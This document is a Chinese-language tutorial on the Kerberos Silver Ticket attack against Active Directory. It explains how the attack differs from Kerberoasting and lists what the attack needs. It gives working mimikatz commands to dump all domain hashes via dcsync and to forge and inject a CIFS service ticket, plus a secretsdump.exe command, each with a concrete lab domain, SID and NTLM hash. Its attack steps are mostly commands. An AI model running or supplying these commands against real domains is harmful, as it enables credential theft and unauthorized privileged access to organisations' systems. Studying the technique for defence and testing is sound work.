29白银票据

## 原理

白银票据就是伪造ST票据，Kerberoasting是破解ST票据中服务用户的hash值

两种之间的区别是：

- 白银票据：伪造ST票据使用的是机器用户的hash值
- Kerberoasting：破解ST票据中的服务用户的hash值

![image-20250729162102968](https://oss.maolin101.com/image-20250729162102968.png-101.webp)

> 利用条件

1. 域名
2. 域SID值
3. 目标服务器名
4. 可利用的服务
5. 目标机器用户的NTLM-HASH值
6. 需要伪造的用户名

## 获取机器用户的hash值

> mimikatz工具

如果有域内管理员账户可以使用dcsync获取

```
lsadump::dcsync /domain:xbxaq.com /all /csv
```

![](https://oss.maolin101.com/202501061840638.png-101.webp)

> secretsdump.exe

通过枚举获取hash值，前提条件拿到了域管理员账号密码

```
secretsdump.exe 域名/administrator:密码@IP地址
```

![](https://oss.maolin101.com/202501061840639.png-101.webp)

## 常用伪造服务

> CIFS

在windows主机之间进行网络文件共享是通过使用微软公司自己的CIFS服务实现的。

> 伪造 LDAP 服务权限

可以实现ldap查询，或者执行dcsync

> host服务

可以实现计划任务等

## 制作票据

通过mimikatz制作票据

```
kerberos::golden /domain:域名 /sid:SID值 /target:目标机器 /service:服务名 /rc4:目标机器上的机器账户NTLM-HASH值 /user:伪造的账户名 </ptt>
```

注意：如果携带/ptt则会自动注入到内存中，不携带则在本地生成票据。

```
kerberos::golden /domain:xbxaq.com /sid:S-1-5-21-1445356431-3472965171-1941165345 /target:dc.xbxaq.com  /service:CIFS /rc4:5881af9f2f219ae270438137a7f59aaf /user:administrator
```

![](https://oss.maolin101.com/202501061840640.png-101.webp)

如果命令后面跟上/ptt

```
kerberos::golden /domain:xbxaq.com /sid:S-1-5-21-1445356431-3472965171-1941165345 /target:dc.xbxaq.com  /service:CIFS /rc4:5881af9f2f219ae270438137a7f59aaf /user:administrator /ptt
```

![](https://oss.maolin101.com/202501061840641.png-101.webp)